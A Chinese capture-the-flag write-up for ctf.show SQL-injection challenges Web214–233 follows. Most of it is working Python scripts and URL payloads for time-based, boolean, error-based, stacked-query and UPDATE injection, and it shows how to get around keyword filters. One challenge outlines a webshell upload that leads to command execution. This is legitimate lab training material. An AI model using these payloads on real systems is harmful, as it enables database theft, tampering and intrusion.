参考:
https://blog.csdn.net/solitudi/article/details/110144623
Web214
在首页的select.js中可以看到:
向/api/提交了两个参数:ip和debug。
经过手动测试,参数ip可以进行sql注入,如下会有延迟:
基于此可以写出s基于时间盲注的脚本:
import requests
url="http://38d705ce-9c40-4fb0-a976-279938603fa8.challenge.ctf.show:8080/api/"
data={
'ip':'',
'debug':0
}
result=''
i=0
while True:
i=i+1
start=32
end=127
while start<end:
mid=(start+end)>>1
#payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx"'
payload='select flaga from ctfshow_flagx'
data['ip']=f'if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)'
try:
res=requests.post(url,data,timeout=1)
end=mid
except Exception as e:
start=mid+1
if start!=32:
result=result+chr(start)
else:
break
print(result)
Web215
相比于上一题,多一个单引号闭合,修改一下
data['ip']
即可:
import requests
url="http://df43f1cf-6768-49ed-8eb1-e89e9f61313b.challenge.ctf.show:8080/api/"
data={
'ip':'',
'debug':0
}
result=''
i=0
while True:
i=i+1
start=32
end=127
while start<end:
mid=(start+end)>>1
#payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxc"'
payload='select flagaa from ctfshow_flagxc'
data['ip']=f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)#"
try:
res=requests.post(url,data,timeout=1)
end=mid
except Exception as e:
start=mid+1
if start!=32:
result=result+chr(start)
else:
break
print(result)
Web216
查询语句如下:
where id = from_base64($id);
1
的base64编码为MQ==
脚本如下:
import requests
url="http://82e0e04e-09e3-4e96-abed-5424c94f5820.challenge.ctf.show:8080/api/"
data={
'ip':'',
'debug':0
}
result=''
i=0
while True:
i=i+1
start=32
end=127
while start<end:
mid=(start+end)>>1
#payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxcc"'
payload='select flagaac from ctfshow_flagxcc'
data['ip']=f"'MQ==') or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)#"
try:
res=requests.post(url,data,timeout=1)
end=mid
except Exception as e:
start=mid+1
if start!=32:
result=result+chr(start)
else:
break
print(result)
Web217
//查询语句:
where id = ($id);
//屏蔽危险分子
function waf($str){
return preg_match('/sleep/i',$str);
}
sleep
被ban了,使用benchmark
绕过:
所以脚本如下,根据网络环境需要调整一下timeout,根据前几位的结果进行调整,因为我们知道flag是以
ctfshow
开头的:
import requests
import time
url="http://24cbb5a9-acb5-4df7-9eb7-9105cf16c0f3.challenge.ctf.show:8080/api/"
data={
'ip':'',
'debug':0
}
result=''
i=0
while True:
i=i+1
start=32
end=127
while start<end:
mid=(start+end)>>1
#payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxccb"'
payload='select flagaabc from ctfshow_flagxccb'
data['ip']=f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmark(10000000,sha(1)),1)#"
try:
res=requests.post(url,data,timeout=4)
end=mid
except Exception as e:
start=mid+1
time.sleep(0.2)
if start!=32:
result=result+chr(start)
else:
break
print(result)
还有很多其他的时间盲注姿势,参考:
https://xz.aliyun.com/t/5505
Web218
//查询语句
where id = ($id);
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark/i',$str);
}
benchmark
也被ban了,使用笛卡尔积盲注:
import requests
url="http://e5bbbb2f-785a-406a-b502-2c5ef04693bc.challenge.ctf.show:8080/api/"
data={
'ip':'',
'debug':0
}
result=''
strr = "1234567890{}-qazwsxedcrfvtgbyhnujmikolp_"
i=0
while True:
i=i+1
for j in strr:
#payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxc"'
payload='select flagaac from ctfshow_flagxc'
data['ip']=f"1) or if(substr(({payload}),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata E),1)#"
try:
res=requests.post(url,data,timeout=0.1)
except Exception as e:
result=result+j
print(result)
Web219
//查询语句
where id = ($id);
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark|rlike/i',$str);
}
同上。
Web220
//查询语句
where id = ($id);
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}
substr
被ban了,使用left
绕过,仍然配合笛卡尔积进行时间盲注:
import requests
import time
url = "http://099770ae-e66d-4ba8-8b1a-d85fd399639b.challenge.ctf.show:8080/api/"
strr = "c_1234567890{}-qazwsxedrfvtgbyhnujmikolp"
#payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1"
payload = "select flagaabcc from ctfshow_flagxcac"
j = 1
res = ""
while 1:
print("############")
print(j)
for i in strr:
res += i
data = {
'ip': f"1) or if(left(({payload}),{j}) = '{res}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
'debug': '1'
}
try:
r = requests.post(url, data=data, timeout=3)
time.sleep(0.2)
res = res[:-1]
except Exception as e:
print(res)
j+=1
break
Web221
//分页查询
$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;
MySQL利用procedure analyse()函数优化表结构
UNION语句中不允许使用PROCEDURE
子句。
参考:https://www.docs4dev.com/docs/zh/mysql/5.7/reference/procedure-analyse.html
基于此,可以构造报错注入:
http://a4d802b0-9f96-436a-9019-353892921a86.challenge.ctf.show:8080/api/?page=1&limit=10 procedure analyse(extractvalue(rand(),concat(0x3a,database())),2)
Web222
提示是group注入:
这里面group by报错注入失败了,那么直接在group by后面拼接上时间盲注,类似于:
select * from ctfshow_user group by 1,if(1=1,sleep(1),1);
因为每则数据都需要group by归类,所以都会执行sleep语句,那么有几条数据就会执行几次sleep。脚本如下:
import requests
url = "http://e7303740-a1d0-4c22-ae06-7cd02332a4c4.challenge.ctf.show:8080/api/"
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
#payload = "select column_name from information_schema.columns where table_name='ctfshow_flaga' limit 1,1"
payload = "select flagaabc from ctfshow_flaga"
res = ""
i=0
while True:
i=i+1
start=32
end=127
while start<end:
mid=(start+end)>>1
params={
'u':f"1,if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),1)"
}
try:
r=requests.get(url,params=params,timeout=0.5)
end=mid
except Exception as e:
start=mid+1
if start!=32:
res=res+chr(start)
else:
break
print(res)
Web223
在提交的时候,
u=username
时返回结果如下:u!=username
时返回结果如下:和上一题相似,可以构造盲注。不过数字被ban了,使用True
绕过:
脚本如下:
import requests
url = "http://fc7dc547-ebe4-4a50-baa9-005f5f76bef9.challenge.ctf.show:8080/api/"
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
#payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
payload = "select flagasabc from ctfshow_flagas"
flag = ""
i=0
def gettrue(num):
res = 'true'
if num == 1:
return res
else:
for i in range(num - 1):
res += "+true"
return res
while True:
i=i+1
start=32
end=127
while start<end:
mid=(start+end)>>1
params={
'u':f"if(ascii(substr(({payload}),{gettrue(i)},{gettrue(1)}))>{gettrue(mid)},username,'a')"
}
r=requests.get(url,params=params)
if "userAUTO" in r.text:
start=mid+1
else:
end=mid
if start != 32:
flag=flag+chr(start)
else:
break
print(flag)
Web224
/robots.txt
:
User-agent: *
Disallow: /pwdreset.php
登陆进去以后是管理员密码重置:
重置后即可登录,进去以后发现是文件上传:
不过并不是单纯的文件上传,毕竟是SQL注入里面的题目,参考:
https://www.gem-love.com/ctf/2283.html#%E4%BD%A0%E6%B2%A1%E8%A7%81%E8%BF%87%E7%9A%84%E6%B3%A8%E5%85%A5
大概流程就是上传图片马,解析时候造成SQL注入写shell,然后访问shell进行命令执行。
Web225
提示说是堆叠注入:
//分页查询
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";
//师傅说过滤的越多越好
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
die(json_encode($ret));
}
方法一:使用handler语句,参考:
https://blog.csdn.net/JesseYoung/article/details/40785137
payload如下:
http://e2dcbccb-a399-4336-8102-60aa9e5c00c5.challenge.ctf.show:8080/api/?username=ctfshow';show%20tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;
方法二:
使用concat()
拼接sql语句来绕过敏感词。
参考:https://blog.csdn.net/solitudi/article/details/107823398
payload如下:
http://e2dcbccb-a399-4336-8102-60aa9e5c00c5.challenge.ctf.show:8080/api/?username=';prepare p from concat('s','elect',' * from ctfshow_flagasa');execute p;
Web226
//分页查询
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";
//师傅说过滤的越多越好
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
die(json_encode($ret));
}
过滤的更多了,不过还是使用prepare
来绕过。因为这是根据一串字符串去生成sql语句,所以可以直接上16进制字符串,所以payload如下:
http://0d6ac274-9bb0-4a78-8378-4549d3fdd18c.challenge.ctf.show:8080/api/?username=';prepare p from 0x73656c656374202a2066726f6d2063746673685f6f775f666c61676173;execute p;
//也就是
http://0d6ac274-9bb0-4a78-8378-4549d3fdd18c.challenge.ctf.show:8080/api/?username=';prepare p from select * from ctfsh_ow_flagas;execute p;
Web227
这一题需要去查看存储过程。
参考:https://blog.csdn.net/qq_41573234/article/details/80411079
绕过的方法和上一题一样,不过要先查看存储过程(发现直接能找到flag),在表里面找不到flag:
payload如下:
http://1dd857dd-4863-4914-80ae-44d6c7786e23.challenge.ctf.show:8080/api/?username=';prepare p from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;execute p;
//也就是
http://1dd857dd-4863-4914-80ae-44d6c7786e23.challenge.ctf.show:8080/api/?username=';prepare p from select * from information_schema.routines;execute p;
然后再调用存储过程即可:
http://1dd857dd-4863-4914-80ae-44d6c7786e23.challenge.ctf.show:8080/api/?username=';call getFlag();
Web228
同Web226。
Web229
同Web226
Web230
同Web226
Web231
//分页查询
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
这是一条更新密码的语句,先输入如下payload:
password=1' where 1=1#&username=1
发现的确可以将所有密码改为1
:
那么因为是有回显的,可以直接将用户名改为我们想要的东西。为什么不直接改密码:因为密码的值被单引号包裹,其中的是字符串不是sql语句。
payload如下:
password=1',username= (select flagas from flaga ) where 1#&username=1
Web232
//分页查询
$sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";
和上面差不多,就是用')
闭合即可。
Web233
//分页查询
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
之前的做法不行了,改用盲注,脚本如下:
import requests
url = "http://944917c4-85c8-4fe6-9b4d-b5896c20dfd9.challenge.ctf.show:8080/api/"
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
#payload = "select group_concat(column_name) from information_schema.columns where table_name='flag233333'"
payload = "select flagass233 from flag233333"
flag = ""
i=0
while True:
i=i+1
start=32
end=127
while start<end:
mid=(start+end)>>1
data={
'username':f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),1)#",
'password':'1'
}
try:
r=requests.post(url,data=data,timeout=2)
end=mid
except Exception as e:
start=mid+1
if start!=32:
flag=flag+chr(start)
else:
break
print(flag)